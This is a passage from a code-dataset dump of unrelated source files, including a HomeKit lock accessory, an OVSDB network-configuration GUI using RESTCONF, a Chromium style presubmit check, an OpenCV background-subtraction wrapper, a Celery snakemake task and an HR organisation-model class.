request_data.update({'dueTime': '2017-06-30 00:00:00'})\n elif bid_type == 3:\n start_time = input('请输入竞价开始时间(格式:2017-06-30 22:22:22):')\n end_time = input('请输入竞价结束时间(格式:2017-06-30 00:00:00):')\n request_data.update({\n 'sellerDepositRatio': 10,\n 'buyerDepositRatio': 20,\n 'buyerFeeId': '3b66da23d01447b9986d9fac2b3f82f4',\n 'sellerFeeId': 'e8c1b95beddf4a118022c36025d7d415',\n 'stepMoney': 1,\n 'startTime': start_time,\n 'endTime': end_time\n })\n headers.update({'app_session': seller_session})\n pprint(request_data)\n result = post_request(request_url, request_data, headers)\n print(json.loads(result)['msg'])\n\n\ndef main():\n # get_my_goods()\n # for good_id in get_my_goods():\n # add_to_cart(good_id)\n # print(goods_card_id)\n # pprint(get_orders(1, 1))\n # submit_order_package()\n # new_address()\n submit_good()\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":10992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"483197807","text":"\"\"\"Class to hold all lock accessories.\"\"\"\nimport logging\n\nfrom pyhap.const import CATEGORY_DOOR_LOCK\n\nfrom openpeerpower.components.lock import DOMAIN, STATE_LOCKED, STATE_UNLOCKED\nfrom openpeerpower.const import ATTR_CODE, ATTR_ENTITY_ID, STATE_UNKNOWN\nfrom openpeerpower.core import callback\n\nfrom .accessories import TYPES, HomeAccessory\nfrom .const import CHAR_LOCK_CURRENT_STATE, CHAR_LOCK_TARGET_STATE, SERV_LOCK\n\n_LOGGER = logging.getLogger(__name__)\n\nOPP_TO_HOMEKIT = {\n STATE_UNLOCKED: 0,\n STATE_LOCKED: 1,\n # Value 2 is Jammed which opp doesn't have a state for\n STATE_UNKNOWN: 3,\n}\n\nHOMEKIT_TO_OPP = {c: s for s, c in OPP_TO_HOMEKIT.items()}\n\nSTATE_TO_SERVICE = {STATE_LOCKED: \"lock\", STATE_UNLOCKED: \"unlock\"}\n\n\n@TYPES.register(\"Lock\")\nclass Lock(HomeAccessory):\n \"\"\"Generate a Lock accessory for a lock entity.\n\n The lock entity must support: unlock and lock.\n \"\"\"\n\n def __init__(self, *args):\n \"\"\"Initialize a Lock accessory object.\"\"\"\n super().__init__(*args, category=CATEGORY_DOOR_LOCK)\n self._code = self.config.get(ATTR_CODE)\n state = self.opp.states.get(self.entity_id)\n\n serv_lock_mechanism = self.add_preload_service(SERV_LOCK)\n self.char_current_state = serv_lock_mechanism.configure_char(\n CHAR_LOCK_CURRENT_STATE, value=OPP_TO_HOMEKIT[STATE_UNKNOWN]\n )\n self.char_target_state = serv_lock_mechanism.configure_char(\n CHAR_LOCK_TARGET_STATE,\n value=OPP_TO_HOMEKIT[STATE_LOCKED],\n setter_callback=self.set_state,\n )\n self.async_update_state(state)\n\n def set_state(self, value):\n \"\"\"Set lock state to value if call came from HomeKit.\"\"\"\n _LOGGER.debug(\"%s: Set state to %d\", self.entity_id, value)\n\n opp_value = HOMEKIT_TO_OPP.get(value)\n service = STATE_TO_SERVICE[opp_value]\n\n if self.char_current_state.value != value:\n self.char_current_state.set_value(value)\n\n params = {ATTR_ENTITY_ID: self.entity_id}\n if self._code:\n params[ATTR_CODE] = self._code\n self.async_call_service(DOMAIN, service, params)\n\n @callback\n def async_update_state(self, new_state):\n \"\"\"Update lock after state changed.\"\"\"\n opp_state = new_state.state\n if opp_state in OPP_TO_HOMEKIT:\n current_lock_state = OPP_TO_HOMEKIT[opp_state]\n _LOGGER.debug(\n \"%s: Updated current state to %s (%d)\",\n self.entity_id,\n opp_state,\n current_lock_state,\n )\n # LockTargetState only supports locked and unlocked\n # Must set lock target state before current state\n # or there will be no notification\n if (\n opp_state in (STATE_LOCKED, STATE_UNLOCKED)\n and self.char_target_state.value != current_lock_state\n ):\n self.char_target_state.set_value(current_lock_state)\n\n # Set lock current state ONLY after ensuring that\n # target state is correct or there will be no\n # notification\n if self.char_current_state.value != current_lock_state:\n self.char_current_state.set_value(current_lock_state)\n","sub_path":"openpeerpower/components/homekit/type_locks.py","file_name":"type_locks.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522449970","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 7 21:32:35 2019\r\n\r\n2d6db786-0708-4110-8ab2-c89d388004fe\r\n\r\n@author: eric\r\n\"\"\"\r\n# Example\r\nimport json\r\nimport requests\r\nimport urllib.parse\r\nfrom tkinter import *\r\nfrom tkinter import simpledialog\r\nfrom tkinter import messagebox\r\nfrom requests.auth import HTTPBasicAuth\r\n\r\n\r\nuuid=\"\"\r\nip=\"\"\r\ndata = {}\r\ndatabridge = {}\r\ndataport = {}\r\ndatacheckconnection={}\r\npath = ''\r\nfileName ='activeconnection'\r\nfileNameBridge ='bridge'\r\nfileNamePort ='port'\r\ndef get_data(): \r\n global uuid\r\n global ip\r\n global data\r\n global putURLconnection\r\n ip=simpledialog.askstring(\"Input Manager ip\",\" Please enter Manager ip \")\r\n uuid=simpledialog.askstring(\"Input Switch uuid\",\" Please enter uuid \")\r\n print(uuid)\r\n ipswitch=simpledialog.askstring(\"Input Switch ip\", \" Please enter Switch ip \")\r\n print(ipswitch)\r\n data = {\r\n \"network-topology:node\": [\r\n {\r\n \"node-id\": \"ovsdb://uuid/\"+uuid,\r\n \"connection-info\": {\r\n \"ovsdb:remote-port\": \"6640\",\r\n \"ovsdb:remote-ip\": ipswitch\r\n }\r\n }\r\n ]\r\n }\r\n putURLconnection='http://' + ip + ':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid\r\n print(putURLconnection)\r\n writeToJSONFile(path,fileName,data)\r\n \r\ndef getconnectionapi():\r\n global datacheckconnection\r\n urlget = 'http://'+ip+':8181/restconf/operational/network-topology:network-topology/topology/ovsdb:1/'\r\n response = requests.get(urlget, auth = HTTPBasicAuth('admin','admin'))\r\n print(response.status_code)\r\n response.json()\r\n with open('data.json','w') as outfile:\r\n json.dump(response.json(),outfile,sort_keys=True,indent=4) \r\n datacheckconnection=response.json()\r\n\r\ndef checkconnection():\r\n getconnectionapi()\r\n for here in datacheckconnection['topology']:\r\n if 'node' not in here:\r\n messagebox.showerror(\"Error\", \"Not Connected\")\r\n else:\r\n messagebox.showinfo(\"Information\",\"Connected\") \r\n \r\ndef checkresult(hasil):\r\n branchcheck = Tk()\r\n branchcheck.title('Result')\r\n Label3= Label(branchcheck, text=hasil, font = ('Calibri' , 20), fg = 'black', width = 11, height = 2, borderwidth = 1, relief = 'solid')\r\n Label3.pack()\r\n branchcheck.geometry(\"200x200\")\r\n branchcheck.mainloop()\r\n \r\n \r\ndef writeToJSONFile(path, fileName, data):\r\n filePathNameWExt = path + fileName + '.json'\r\n with open(filePathNameWExt, 'w') as fp:\r\n json.dump(data, fp , sort_keys=True,indent=4) \r\n \r\n\r\ndef initiateconnection():\r\n dataconnection = 'activeconnection.json'\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n with open(dataconnection) as fh:\r\n mydata = fh.read()\r\n responsePut = requests.put(putURLconnection,\r\n data=mydata,\r\n auth=HTTPBasicAuth('admin','admin'),\r\n headers=headers,\r\n )\r\n print(responsePut.status_code)\r\n #checkresult(responsePut.status_code)\r\n \r\n \r\ndef addbridge():\r\n global databridge\r\n global putURLbridge\r\n bridge=simpledialog.askstring(\"input bridge name\",\"please enter bridge name\")\r\n ipcontroller=simpledialog.askstring(\"input Controller ip\",\"please enter Controller ip\")\r\n print(bridge)\r\n databridge={\r\n \"network-topology:node\": [\r\n {\r\n \"node-id\": \"ovsdb://uuid/\"+uuid+\"/bridge/\"+bridge,\r\n \"ovsdb:bridge-name\": bridge,\r\n \"ovsdb:protocol-entry\": [\r\n \t\t{\r\n \t\t\t\"protocol\": \"ovsdb:ovsdb-bridge-protocol-openflow-13\"\r\n \t\t}\r\n \t ],\r\n \"ovsdb:controller-entry\": [\r\n {\r\n \"target\": \"tcp:\" + ipcontroller + \":6633\"\r\n }\r\n ],\r\n \"ovsdb:managed-by\": \"/network-topology:network-topology/network-topology:topology[network-topology:topology-id='ovsdb:1']/network-topology:node[network-topology:node-id='ovsdb://uuid/\"+ uuid +\"']\"\r\n }\r\n ]\r\n }\r\n putURLbridge='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+ bridge\r\n \r\n\r\ndef sendbridge():\r\n dataconnection = 'bridge.json'\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n with open(dataconnection) as fh:\r\n mydata = fh.read()\r\n responsePut = requests.put(putURLbridge,\r\n data=mydata,\r\n auth=HTTPBasicAuth('admin','admin'),\r\n headers=headers,\r\n )\r\n print(responsePut.status_code)\r\n #checkresult(responsePut.status_code)\r\n \r\ndef combinebridge():\r\n addbridge()\r\n writeToJSONFile(path,fileNameBridge,databridge)\r\n sendbridge()\r\n \r\ndef addport():\r\n global dataport\r\n global putURLport\r\n bridge=simpledialog.askstring(\"input bridge name\",\"please enter bridge name you want to add port\")\r\n portname=simpledialog.askstring(\"input port name\",\"please enter port name\")\r\n portnumber=simpledialog.askstring(\"input port number\",\"please enter port number\")\r\n portnameencode=urllib.parse.quote(portname,safe ='')\r\n print(portnameencode)\r\n dataport={\r\n \"network-topology:termination-point\": [\r\n {\r\n \"tp-id\": portname,\r\n \"ovsdb:ofport\": portnumber,\r\n \"ovsdb:name\": portname\r\n }\r\n ]\r\n }\r\n putURLport='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+bridge+'/termination-point/'+portnameencode\r\n print(putURLport)\r\n \r\n\r\ndef sendport():\r\n dataconnection = 'port.json'\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n with open(dataconnection) as fh:\r\n mydata = fh.read()\r\n responsePut = requests.put(putURLport,\r\n data=mydata,\r\n auth=HTTPBasicAuth('admin','admin'),\r\n headers=headers,\r\n )\r\n print(responsePut.status_code)\r\n #checkresult(responsePut.status_code) \r\n\r\ndef combineport():\r\n addport()\r\n writeToJSONFile(path,fileNamePort,dataport)\r\n sendport()\r\n \r\ndef deletebridge():\r\n global deleteURL\r\n bridge=simpledialog.askstring(\"Input bridge name you want to delete\",\"Input bridge name you want to delete\")\r\n deleteURL='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+ bridge\r\n print(bridge)\r\n print(deleteURL)\r\n\r\ndef deleteapi():\r\n payload={'some':'data'}\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n response = requests.delete(deleteURL, data=json.dumps(payload), headers=headers,auth=HTTPBasicAuth('admin', 'admin'))\r\n print(response.status_code)\r\n #checkresult(response.status_code)\r\n \r\ndef combinedelbridge():\r\n deletebridge()\r\n deleteapi()\r\n \r\ndef deleteport():\r\n global deleteURL\r\n bridge=simpledialog.askstring(\"Input bridge name where port is located\",\"Input bridge name where is port located\")\r\n portname=simpledialog.askstring(\"input port name\",\"please enter port name\")\r\n portnameencode=urllib.parse.quote(portname,safe ='')\r\n deleteURL='http://'+ip+':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid+'%2Fbridge%2F'+ bridge+'/termination-point/'+portnameencode\r\n print(bridge)\r\n print(deleteURL)\r\n\r\ndef combinedelport():\r\n deleteport()\r\n deleteapi()\r\n\r\ndef terminateconnection():\r\n terminateurl='http://' + ip + ':8181/restconf/config/network-topology:network-topology/topology/ovsdb:1/node/ovsdb:%2F%2Fuuid%2F'+uuid\r\n payload={'some':'data'}\r\n\r\n headers = {'Accept':'application/json','Content-type':'application/json'}\r\n\r\n response = requests.delete(terminateurl, data=json.dumps(payload), headers=headers,auth=HTTPBasicAuth('admin', 'admin'))\r\n print(response.status_code)\r\n #checkresult(response.status_code)\r\n \r\ndef delete():\r\n branch = Tk()\r\n branch.title('Choose what you want to delete?')\r\n button8= Button(branch, text=\" Delete Bridge \",command=combinedelbridge)\r\n button8.pack(pady=10,ipady=2)\r\n button9= Button(branch, text=\" Delete Port \",command=combinedelport)\r\n button9.pack(pady=10,ipady=2)\r\n branch.geometry(\"400x100\")\r\n branch.mainloop()\r\n \r\ndef callovsdb():\r\n root = Tk()\r\n width = 300\r\n height = 400\r\n screen_width= root.winfo_screenwidth()\r\n screen_height = root.winfo_screenheight()\r\n \r\n x_coordinate = (screen_width/2) - (width/2)\r\n y_coordinate = (screen_height/2) - (height/2)\r\n root.title('OVSDB ToolBar') \r\n button = Button(root, text=\" Input Manager IP and Switch UUID & IP \",command=get_data)\r\n button.pack(pady=10,ipady=2)\r\n button2= Button(root, text=\" Initiate Active Connection \",command=initiateconnection)\r\n button2.pack(pady=10,ipady=2)\r\n button3= Button(root, text=\" Check Connection \",command=checkconnection)\r\n button3.pack(pady=10,ipady=2)\r\n button4= Button(root, text=\" Terminate Connection \",command=terminateconnection)\r\n button4.pack(pady=10,ipady=2)\r\n button5= Button(root, text=\" Add-Bridge \",command=combinebridge)\r\n button5.pack(pady=10,ipady=2)\r\n button6= Button(root, text=\" Add-Port \",command=combineport)\r\n button6.pack(pady=10,ipady=2)\r\n button7= Button(root, text=\" Delete Bridge or Port \",command=delete)\r\n button7.pack(pady=10,ipady=2)\r\n label1 = Label(root, text = \"author : eric_angwyn\")\r\n label1.pack(side=RIGHT)\r\n root.geometry(\"%dx%d+%d+%d\" % (width, height, x_coordinate, y_coordinate))\r\n root.mainloop()\r\n ","sub_path":"EasyFlow2.0/uuidswitch.py","file_name":"uuidswitch.py","file_ext":"py","file_size_in_byte":10484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494370568","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"\nPresubmit for Chromium HTML/CSS/JS resources. See chrome/browser/PRESUBMIT.py.\n\"\"\"\n\nimport regex_check\n\n\nclass ResourceChecker(object):\n def __init__(self, input_api, output_api, file_filter=None):\n self.input_api = input_api\n self.output_api = output_api\n self.file_filter = file_filter\n\n def IncludeCheck(self, line_number, line):\n return regex_check.RegexCheck(self.input_api.re, line_number, line,\n \"(|)\", \"Closing tags is unnecessary.\")\n\n def RunChecks(self):\n \"\"\"Check for violations of the Chromium web development style guide. See\n http://chromium.org/developers/web-development-style-guide\n \"\"\"\n results = []\n\n affected_files = self.input_api.change.AffectedFiles(\n file_filter=self.file_filter, include_deletes=False)\n\n for f in affected_files:\n errors = []\n\n for line_number, line in enumerate(f.NewContents(), start=1):\n error = self.IncludeCheck(line_number, line)\n if error:\n errors.append(error)\n\n if errors:\n abs_local_path = f.AbsoluteLocalPath()\n file_indicator = 'Found resources style issues in %s' % abs_local_path\n prompt_msg = file_indicator + '\\n\\n' + '\\n'.join(errors) + '\\n'\n results.append(self.output_api.PresubmitPromptWarning(prompt_msg))\n\n return results\n","sub_path":"chrome/browser/web_dev_style/resource_checker.py","file_name":"resource_checker.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320327975","text":"\"\"\"\nMog2 background subtraction\nWrapper around opencv implementation\nEmily Dunkel\n2018\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport pdb\n\n\ndef get_diff(img, aux, config, is_first_frame):\n \"\"\"\n Returns mask\n\n Sample Inputs\n >>> config = {}\n >>> config['history'] = 200\n >>> config['varThresh'] = 15\n >>> config['alpha'] = 0.05\n >>> img = np.array([[5, 0, 15], [0, 5, 0], [15, 0 , 5]])\n\n Test on first frame\n >>> fgmask, aux = get_diff(img, {}, config, True) \n >>> fgmask\n array([[255, 255, 255],...\n\n Test on second frame but with no aux, should raise error\n >>> out1, out2 = get_diff(img, {}, config, False)\n Traceback (most recent call last):\n KeyError:...\n\n Test on second frame, with img equal to previous one, should equal all zeros\n >>> fgmask, aux = get_diff(img, aux, config, False)\n >>> fgmask\n array([[0, 0, 0],...\n\n Test on third frame, with new img. fgmask should be 255 where img == 100\n >>> img = np.array([[5, 100, 15], [100, 5, 100], [15, 100 , 5]])\n >>> fgmask, aux = get_diff(img, aux, config, False)\n >>> fgmask\n array([[ 0, 255, 0],...\n \"\"\"\n\n if is_first_frame:\n mog = cv2.createBackgroundSubtractorMOG2(history=config['history'], varThreshold=config['varThresh'], detectShadows=False)\n aux['mog2'] = {}\n else:\n try:\n mog = aux['mog2']['mog']\n except:\n raise KeyError('aux input to mog2.py does not contain mog2')\n fgmask = mog.apply(img, learningRate=config['alpha'])\n \n # store mog object for next time \n aux['mog2']['mog'] = mog\n return fgmask, aux\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)\n","sub_path":"helm/tracker/preprocessors/background_subtractions/mog2.py","file_name":"mog2.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"641701102","text":"from __future__ import absolute_import, unicode_literals\nfrom celery import shared_task\nimport subprocess\nimport os\nimport delegator\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n@shared_task\ndef start_snakemake_task(working_directory):\n logger.debug('Start snakemake')\n logger.debug(\"working_directory: \", working_directory)\n\n snakefile = os.path.join(working_directory, 'Snakefile')\n print(\"snakefile!! : \", snakefile)\n # subprocess.check_output(['/ssd/Howard/Virus/venv/bin/snakemake', '-s', snakefile], shell=True)\n # os.system('/ssd/Howard/Virus/venv/bin/snakemake -s ' + snakefile)\n\n snakemake_command = '/ssd/Howard/Virus/venv/bin/snakemake' + snakefile\n snakemake_result = delegator.run('whoami', block=False)\n print(\"c.pid: \", snakemake_result.pid)\n print(\"c.out: whoami ~ \", snakemake_result.out)\n print(\"c.return_code: \", snakemake_result.return_code)\n\n snakemake_result = delegator.run('groups', block=False)\n print(\"c.pid: \", snakemake_result.pid)\n print(\"c.out: groups ~ \", snakemake_result.out)\n print(\"c.return_code: \", snakemake_result.return_code)\n print(\"Second time!\")\n\n # snakemake_command = '/ssd/Howard/Virus/venv/bin/snakemake' + snakefile\n # snakemake_result = delegator.run('/ssd/Howard/Virus/venv/bin/snakemake', cwd = working_directory, block=False)\n # print(\"c.pid: \", snakemake_result.pid)\n # print(\"c.out: \", snakemake_result.out)\n # print(\"c.return_code: \", snakemake_result.return_code)\n\n # snakemake_output_file = os.path.join(working_directory, 'logs', 'snakemake_output.log')\n\n snakemake_result = subprocess.call(['/ssd/Howard/Virus/venv/bin/snakemake'], cwd = working_directory, shell=True)\n # Write snakemake output to log file!\n # print(\"snakemake_result: \", snakemake_result)\n # with open('snakemake_output_file', 'wb') as f:\n # f.write(snakemake_output_file.stdout)\n\n print(\"snakemake_result: \", snakemake_result)\n","sub_path":"VirusRNASeq/dataanalysis/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"156290256","text":"from scope.employees import Employee\nfrom scope.position_objects import Position, Vacancy\nfrom scope.subdivisions import Department, Unit\n\n\nclass Environment:\n \"\"\"\n Class is responsible for handling of all processes at the site.\n The class saves all created objects and works with it.\n \"\"\"\n def __init__(self):\n self.departments = []\n self.units = []\n self.positions = []\n self.vacancies = []\n self.employees = []\n\n def create_department(self, **kwargs):\n \"\"\"\n The function is responsible for department object creation.\n Creates the object and adds to Environment's list of Department objects.\n \"\"\"\n department = Department.create_subdivision(**kwargs)\n self.departments.append(department)\n\n def create_unit(self, **kwargs):\n \"\"\"\n The function is responsible for unit object creation.\n Creates the object and adds to Environment's list of Unit objects.\n \"\"\"\n unit = Unit.create_subdivision(**kwargs)\n self.units.append(unit)\n self.create_unit_relations(unit)\n\n def create_unit_relations(self, unit):\n \"\"\"\n Checks relations between Unit and existing departments.\n Adds Unit's object to specific Department (into private units list).\n \"\"\"\n unit_department_id = unit.get_department_id()\n if unit_department_id:\n for department in self.departments:\n department.check_relation(unit_department_id, unit)\n\n def update_department(self, **kwargs):\n department = self.define_department_by_id(**kwargs)\n department.change_department(**kwargs)\n self.check_department_name_changes(department, **kwargs)\n\n def define_department_by_id(self, **kwargs):\n required_department_id = kwargs['id']\n for department in self.departments:\n if department.get_id() == required_department_id:\n return department\n\n def check_department_name_changes(self, department, **kwargs):\n department_name = kwargs['name']\n if department_name:\n department_id = department.get_id()\n self.update_unit_relations_to_department(department_id, department_name)\n self.update_position_relations_to_department(department_id, department_name)\n\n def update_unit_relations_to_department(self, id, name):\n department_id = id\n department_name = name\n for unit in self.units:\n if unit.get_department_id() == department_id:\n unit.change_department_name(department_name)\n\n def update_position_relations_to_department(self, id, name):\n department_id = id\n department_name = name\n for position in self.positions:\n subdivision_data = position.get_subdivision_data()\n subdivision_id = subdivision_data[0]\n print(subdivision_data, subdivision_id)\n if subdivision_id == department_id:\n position.change_subdivision_name(department_name)\n\n def update_unit(self, **kwargs):\n unit = self.define_unit_by_id(**kwargs)\n dep_id_initial = unit.get_department_id()\n unit.change_unit(**kwargs)\n dep_id_updated = unit.get_department_id()\n self.update_unit_relations(dep_id_initial, dep_id_updated, unit)\n\n def define_unit_by_id(self, **kwargs):\n required_unit_id = kwargs['id']\n for unit in self.units:\n if unit.get_id() == required_unit_id:\n return unit\n\n def update_unit_relations(self, dep_id_initial, dep_id_updated, unit):\n for department in self.departments:\n if dep_id_initial == department.get_id():\n department.units.remove(unit)\n if dep_id_updated == department.get_id():\n department.units.append(unit)\n\n def delete_department(self, **kwargs):\n department = self.define_department_by_id(**kwargs)\n dep_id = department.get_id()\n self.departments.remove(department)\n self.update_department_relations(dep_id)\n\n def update_department_relations(self, id):\n for unit in self.units:\n unit.discard_department_relation(id)\n\n def delete_unit(self, **kwargs):\n unit = self.define_unit_by_id(**kwargs)\n department_id = unit.get_department_id()\n self.units.remove(unit)\n self.delete_unit_from_department(department_id, unit)\n\n def delete_unit_from_department(self, department_id, unit):\n for department in self.departments:\n if department_id == department.get_id():\n department.units.remove(unit)\n\n def check_names(self, object_, name):\n if object_ == 'department':\n for department in self.departments:\n if name == department.get_name():\n return True\n elif object_ == 'unit':\n for unit in self.units:\n if name == unit.get_name():\n return True\n elif object_ == 'position':\n for position in self.positions:\n if name == position.get_name():\n return True\n elif object_ == 'vacancy':\n for vacancy in self.vacancies:\n if name == vacancy.get_name():\n return True\n\n def delete_object(self, **kwargs):\n object_type = kwargs['object_type']\n object_ = self.define_object_by_id(**kwargs)\n subdivision_data = object_.get_subdivision_data()\n if object_type == 'position':\n self.positions.remove(object_)\n elif object_type == 'vacancy':\n self.vacancies.remove(object_)\n elif object_type == 'employee':\n self.employees.remove(object_)\n self.delete_from_old_position(object_)\n\n if subdivision_data[1] == 'department':\n self.delete_object_from_department(subdivision_data[0], object_)\n elif subdivision_data[0] == 'unit':\n self.delete_object_from_unit(subdivision_data[0], object_)\n\n def delete_object_from_department(self, department_id, object_):\n for department in self.departments:\n if department.get_id() == department_id:\n if object_.__class__.__name__ == 'Position':\n department.positions.remove(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n department.vacancies.remove(object_)\n elif object_.__class__.__name__ == 'Employee':\n department.employees.remove(object_)\n\n def delete_object_from_unit(self, unit_id, object_):\n for unit in self.units:\n if unit.get_id() == unit_id:\n if object_.__class__.__name__ == 'Position':\n unit.positions.remove(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n unit.vacancies.remove(object_)\n elif object_.__class__.__name__ == 'Employee':\n unit.employees.remove(object_)\n\n def create_object(self, **kwargs):\n object_type = kwargs['object_type']\n object_ = None\n if object_type == 'position':\n object_ = Position.create_position_object(**kwargs)\n self.positions.append(object_)\n elif object_type == 'vacancy':\n object_ = Vacancy.create_position_object(**kwargs)\n self.vacancies.append(object_)\n self.create_object_relation_to_position(object_)\n self.create_object_relations_to_subdivisions(object_)\n\n def create_object_relation_to_position(self, object_):\n object_type = object_.__class__.__name__\n if object_type == 'Vacancy':\n for position in self.positions:\n if position.get_id() == object_.position_id:\n position.holder = (object_, 'vacancy')\n elif object_type == 'Employee':\n object_.position_id = None\n for vacancy in self.vacancies:\n if vacancy.get_id() == object_.vacancy_id:\n object_.position_id = vacancy.position_id\n object_.position_name = vacancy.position_name\n for position in self.positions:\n if position.get_id() == object_.position_id:\n position.holder = (object_, 'employee')\n\n def create_object_relations_to_subdivisions(self, object_):\n subdivision_id, subdivision_category = object_.get_subdivision_data()\n if subdivision_category == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_id:\n if object_.__class__.__name__ == 'Position':\n department.add_position(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n department.add_vacancy(object_)\n elif object_.__class__.__name__ == 'Employee':\n department.add_employee(object_)\n elif subdivision_category == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_id:\n if unit.get_id() == subdivision_id:\n if object_.__class__.__name__ == 'Position':\n unit.add_position(object_)\n elif object_.__class__.__name__ == 'Vacancy':\n unit.add_vacancy(object_)\n elif object_.__class__.__name__ == 'Employee':\n unit.add_employee(object_)\n\n def update_object(self, **kwargs):\n object_ = self.define_object_by_id(**kwargs)\n subdivision_data_initial = object_.get_subdivision_data()\n object_.change_position(**kwargs)\n subdivision_data_updated = object_.get_subdivision_data()\n self.update_object_relations(subdivision_data_initial, subdivision_data_updated, object_)\n\n def define_object_by_id(self, **kwargs):\n object_type = kwargs['object_type']\n required_object_id = kwargs['id']\n if object_type == 'position':\n for position in self.positions:\n if position.get_id() == required_object_id:\n return position\n elif object_type == 'vacancy':\n for vacancy in self.vacancies:\n if vacancy.get_id() == required_object_id:\n return vacancy\n elif object_type == 'employee':\n for employee in self.employees:\n if employee.get_id() == required_object_id:\n return employee\n\n def update_object_relations(self, subdivision_data_initial, subdivision_data_updated, object):\n if object.__class__.__name__ == 'Position':\n if subdivision_data_initial[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_initial[0]:\n department.positions.remove(object)\n elif subdivision_data_initial[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_initial[0]:\n unit.positions.remove(object)\n if subdivision_data_updated[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_updated[0]:\n department.positions.append(object)\n elif subdivision_data_updated[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_updated[0]:\n unit.positions.append(object)\n\n elif object.__class__.__name__ == 'Vacancy':\n if subdivision_data_initial[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_initial[0]:\n department.vacancies.remove(object)\n elif subdivision_data_initial[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_initial[0]:\n unit.vacancies.remove(object)\n if subdivision_data_updated[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_updated[0]:\n department.vacancies.append(object)\n elif subdivision_data_updated[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_updated[0]:\n unit.vacancies.append(object)\n\n elif object.__class__.__name__ == 'Employee':\n if subdivision_data_initial[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_initial[0]:\n department.employees.remove(object)\n elif subdivision_data_initial[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_initial[0]:\n unit.employees.remove(object)\n if subdivision_data_updated[1] == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_data_updated[0]:\n department.employees.append(object)\n elif subdivision_data_updated[1] == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_data_updated[0]:\n unit.employees.append(object)\n\n def create_employee(self, **kwargs):\n employee = Employee.create_employee(**kwargs)\n self.employees.append(employee)\n self.create_object_relation_to_position(employee)\n self.create_object_relations_to_subdivisions(employee)\n self.delete_vacancy_relation(employee.vacancy_id)\n employee.update_cooperation_history()\n\n def delete_vacancy_relation(self, vacancy_id):\n for vacancy in self.vacancies:\n if vacancy.get_id() == vacancy_id:\n self.vacancies.remove(vacancy)\n\n subdivision_id = vacancy.subdivision_id\n subdivision_category = vacancy.subdivision_category\n if subdivision_category == 'department':\n for department in self.departments:\n if department.get_id() == subdivision_id:\n department.vacancies.remove(vacancy)\n elif subdivision_category == 'unit':\n for unit in self.units:\n if unit.get_id() == subdivision_id:\n unit.vacancies.remove(vacancy)\n\n def update_employee(self, **kwargs):\n object_ = self.define_object_by_id(**kwargs)\n subdivision_data_initial = object_.get_subdivision_data()\n object_.change_employee(**kwargs)\n subdivision_data_updated = object_.get_subdivision_data()\n self.update_object_relations(subdivision_data_initial, subdivision_data_updated, object_)\n self.delete_from_old_position(object_)\n self.create_object_relation_to_position(object_)\n self.delete_vacancy_relation(object_.vacancy_id)\n object_.update_cooperation_history()\n\n def delete_from_old_position(self, object_):\n object_position_id = object_.get_position_id()\n for position in self.positions:\n if position.get_id() == object_position_id:\n position.holder = None","sub_path":"scope/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":15610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"235710094","text":"\"\"\"ecommerce URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based 